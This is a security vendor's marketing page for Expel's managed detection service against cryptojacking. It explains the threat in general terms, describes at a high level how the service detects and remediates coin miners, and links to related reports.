AnnouncementCase StudyCheckmarkcustomer-story-iconData Sheethow-to-logoposts
skip to Main Content

Q2 Threat Report. SOC trends to take action on | Take a tour of Expel MDR for Cloud Infrastructure


Protect against cryptojacking

 Expel-validated security alerts and guided investigative actions

Cryptojacking … the who, what, and why.

Cybercriminals: they’re always looking for new ways to make money. We often hear about holding data or systems for ransom. But what about cryptojacking? It’s when a threat actor steals your organization’s computing resources/power and uses it to mine various crypto-currency blockchains. The bad news: it can slow your network way down, and even shut down critical processes.

The attack can be pretty straightforward – no need to escalate privileges or move laterally to get to the host with the secret they need. As our end-of-year report indicated, 35% of the web application compromise incidents we saw in 2021 resulted in deployment of various cryptocurrency coin miners. It’s a sweet gig for the bad guys, too: after the miner is deployed, they can sit back, relax, and watch the money pile up.

How do they get in? Public application exploitation. Access key compromise. Phishing emails. USB devices. These are just some of the ways. And the list grows every year.

What are your biggest cryptojacking prevention challenges?

I need to know if coin miners are installed.

I need visibility (ideally EDR) into host activity that could be coin miner entry points.

I need a “playbook” for coin miner investigating and fixing.

I need recommendations to proactively mitigate exploitations used for cryptojacking.

How Expel spots cryptojacking attacks

We set up alerts for process command line arguments, strange process lineages, and network connections to well-known cryptojacking pool domains or to access cryptojacking utilities through multiple detection sources like EDR. We look for behavioral patterns. Then our bots, Josie™ and Ruxie™, get to work and automatically enrich and triage alerts, surfacing up Expel-validated alerts. We notify you of alerts that matter and will automatically remediate the incident (unless you prefer to handle remediations yourself).

Recently our SOC detected miners for the Monero blockchain, SolarMarker, Emotet, and Asyncrat – the top malware families.

Results. Not more alerts to handle.

Reduce risk

We detect cryptojacking attacks fast so your business doesn’t slow down

Maximize ROI

We leverage existing detection sources in your environment to detect cryptojacking

Improve Security Posture

We recommend resilience measures to mitigate future attacks

Cryptojacking protection:
Identify and remediate compromised accounts and access, unusual behavior and more.

Fortunately, attacker entry points for cryptojacking overlap with those for other threat types like ransomware, so focused efforts to reduce your cryptojacking attack surface can help protect against multiple problems.

Related Resources


Detecting Coin Miners with Palo Alto Networks NGFW

With cryptojacking on the rise, we walk through why we’ve found Palo Alto Networks next- generation firewall is great at detecting it, and some actions we’ve integrated into our detection bot to help.


Expel Quarterly Threat Report - Q2 2022

This Q2 report delivers intelligence on some of the most active attack vectors our SOC leadership team observed.


Inside an Expel response

See why our median alert-to-fix timelines are shorter than the time it takes to deliver a pizza.

Review Expel on G2

© 2022 Expel, Inc. All Rights Reserved

Back To Top